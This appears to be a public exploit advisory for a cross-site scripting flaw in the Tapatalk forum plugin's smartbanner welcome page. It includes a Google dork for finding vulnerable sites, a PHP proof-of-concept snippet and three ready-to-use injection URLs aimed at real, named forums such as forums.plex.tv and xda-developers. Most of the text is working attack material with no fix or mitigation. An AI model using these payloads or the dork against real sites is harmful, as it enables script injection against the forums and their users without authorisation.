Tapatalk Forum suffers from a cross site scripting vulnerability.
253cd5c79575f7fb9259f5fda766b097a52ff591c1badea81b43b1012790918a
##################################################################################
__ _ _ ____
/ /___ _____ (_)_____________ ______(_)__ _____ / __ \_________ _
__ / / __ `/ __ \/ / ___/ ___/ __ `/ ___/ / _ \/ ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__ |__ ) /_/ / / / / __(__ )/ /_/ / / / /_/ /
\____/\__,_/_/ /_/_/____/____/\__,_/_/ /_/\___/____(_)____/_/ \__, /
/____/
Janissaries.Org
##################################################################################
Exploit Title : Tapatalk Universal Forum Application XSS Vulnerability (All Version)
Author : E. Burtay Sahin
Author Mail : admin@burtay.org
Author Homepage : http://www.burtay.org
Community Hpage : http://www.janissaries.org
Google Dork : inurl:mobiquo
Vendor Homepage : http://tapatalk.com/
Software Link : http://tapatalk.com/activate_tapatalk.php
Version : All Version
##################################################################################
P0C
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
.'?referer='.urlencode($referer)
.'&code='.urlencode($code)
.'&board_url='.urlencode($board_url)
.'&lang='.urlencode($lang)
.$byo
.'&callback=?';
<?php echo $ads_url; ?>
##################################################################################
3 Live Examples
1.)Version ip34_3.8.2
https://forums.plex.tv/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr
2.)Version vb3x_4.3.2
http://forum.xda-developers.com/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr
3.)Version pb30_4.4.0
http://www.passion-multirotor.fr/forum/mobiquo/smartbanner/welcome.php?referer=%22%3E%3C/script%3E%3Ch1%3EBurtay%20Can%20Execute%20H1%20tags%3C/h1%3E&code=401e11c4884d0fcf848a6b1a85c8945d&board_url=https%3A%2F%2Fforums.plex.tv&lang=tr